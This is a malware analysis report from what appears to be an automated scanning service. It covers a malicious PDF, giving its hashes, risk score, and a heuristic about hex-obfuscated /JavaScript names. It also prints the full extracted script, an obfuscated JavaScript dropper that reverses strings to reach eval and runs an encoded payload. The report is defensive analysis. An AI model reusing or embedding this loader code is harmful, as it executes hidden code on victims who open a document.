Malicious PDF — malware analysis report

Static analysis result for SHA-256 43f9da73195eccf4…

MALICIOUS

PDF

7.3 KB Authoring application: Bofatezozinefaxfa (via 25dd4Vogewojixariuawi) First seen: 2012-09-15
MD5: 2088eff1cdabef66bdb5866c04073764 SHA-1: 5f4321338cbf827231ecb022109cee2dbdd74702 SHA-256: 43f9da73195eccf4af65df30071ea83f2fb28738715d74ecb28e32c1cd9a352e
106 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9954

Heuristics 3

  • Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT
    A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0x1349 2325 bytes
SHA-256: ca838ab153ea9de4fff1e74bdd0848fd720f71bc6fbee4425be234136cd19b41
Preview script
First 1,000 lines of the extracted script
var f = null;

try {

var vKB=new String("lengt"+"h");
var lKH="rA"+"t";
var pUL=String("cha");
var zOD=this;
var vIL=50;
var tSD=1;
var bWP=0;


var vUH=/[9\|k7]/g;

function dSJ(lEZ){
this.x=lEZ;
};


var hCP="va|r9 9c|XkM|T7=9tkh7iks7.kxk;7z7=9\'9g7e7t|P7akg|e7N|\'9;9hkQ|Zk=|zk+|\'|tkh7W9o|r|d|\'7;|n|AkN|=9zk+k\'7u7mkW9o7rkd7s9\'k;9p9W7J9=9\'9p|akg9e9N9u|m|\'7;9pkO|V| 9=k 92k374k 7;kjkW7Zk=9\'|\'|;7o7X9CkRk=|\'7j9o9ikn7\'k;7j9O9Jk=|\'|\'9;7b9W|P7=90|;9lkAkR|=|Skt|r7iknkg7;7tkG9X7=|\'|sku|b7s|tkr9\'7;|rkA|R|=|\'7e7v9akl|\'|;9v7K|Bk=7\'klke|n|gkt9h7\'7;|f|I|N|=9\'k\\7\\|xk\'k;kvkQ|R9=9\'9tko|S7tkr9i9n9g|\'7;9rkQkZ9=k\'7p|a7r9s|ekIkn7t7\'7;|lkO7P|=9\'kf9r7o|m9C|h7a9r|C7o|dke|\'k;kz7UkP7=9\'kc7h|a9r|C9o9d|e9A9t|\'9;7t7S9D9=747/94|;9xkQ9Bk=k1|+k4|;9z7EkB9=72k070k+k595|;|zkO9D7=7\'|d|o|ck\'|;|t7M9Z7=93k3k2|;kl7W7Hk=|[k]7;|fkC9V9=|\'7\'9;|r9G9PkMk=k1k6k;7j7K7H|=|29;7t|M|R|=k4k;7p|Y9Vk=|c9X9M9T7[9nkA|N9]k(|c9X7M9T9[|p7W|J|]9)|;kf9o9rk(9z7I|R7=7b|W7Pk;9z9I7R9<9 |pkY7Vk;7 7z9I9R9+|+9)k{9vka7r| |xkM|F9=|ckX9MkT7[9h9Q7Zk]k(9ckXkMkTk[7pkWkJ9]7,7z9IkR9,|t7rku7e|)7;7j9O9J9=9[7j9O7Jk,7xkM|Fk]9[7o|X|C9R|]9(|jkWkZk)7;9;7}7fko7r|(|zkI|R9=90|;kz|I7Rk |<k |j9O|J9[9vkK|Bk]9;| |z|IkR7+7=9j9K9H9)k{|j7OkJ|C|=kj|O9J|[9t7GkX7]k(|z|I|R9,9jkK|Hk)7;kf9AkX9=|pkakrks7ekI7n|t9(|j7O|J9C|,7rkGkPkMk)k;7fkI|V7=|fkAkX9^kp9O9Vk;9d7Y7D9=7f|I7V|.7t|o|S|t9r|ikn|g|(7rkG|P|M|)9;|d7Y7D7=k(9d9Y9D9[7v9K9B7]|=k=kt7S9D|)7 |?9 |\'|07\'7 9+k 9dkY|D| 9:7 9d7Y7D9;7l9WkHk.9p|u9s7h7(|d7Y|D9)9;|}kt|r9y| |{7f7CkV|=7n7e9w| 7S9t9rki9nkg|(7f|I9N| 7+| 9l7W9H7[9o9X7C9Rk]|(kf7I9N9)9)9;ka9p7pk[kr|A7Rk]k(|\'|f|CkV|=9\"|\'k+kf9CkV9+9\'k\"7;7\'7)k;9c7X9MkT|.9vkW|B9=9(kf|C|Vk[kt9G|X7]k(9f9CkV9[kv|K7B7]k-7t9MkZk)7)k;9c9X9M|T7.|r9Q|T9=k(7f7C|V|[7t7GkX|]9(kbkWkP|,7f9C|V7[|vkK9B9]|-7t7M7Z7)7)9;kr|Q7L|(k)|;7}9 kc9a7tkc|h9(kn|IkN7)9{|ikf9(7ckX|M|T9.9r7Q|T|)k{|tkrky| 7{ka7p|p7[7r9A|R7]9(|c9X|M|T9.|r9QkT|)|;9}7 9ckaktkc|hk(7nkIkN|)|{k}7}| |e7l|s7e| k{9}9}9";


app.rOD=function(nOV){

nCB='';
var dMZ = pUL + lKH;
for(zIR=nOV[vKB];zIR >= 0;zIR--){
 nCB+=nOV[dMZ](zIR);
}

return nCB;
}

var rOD=app.rOD;

rAR=rOD(String("lav"+"e"));
tYR = app.rOD('epytotorp');

hCP=hCP.replace(vUH, '');


dSJ.prototype={

bOT : function(pOJ){
if(pOJ > vIL){
this.x[rAR](hCP);
} else {
f.bOT(pOJ+tSD);
}
},
};

var f=new dSJ(zOD);

f.bOT(bWP);

} catch(fCV){
app.alert(fCV);
}

Open this report in the interactive analyzer, or submit your own file for analysis.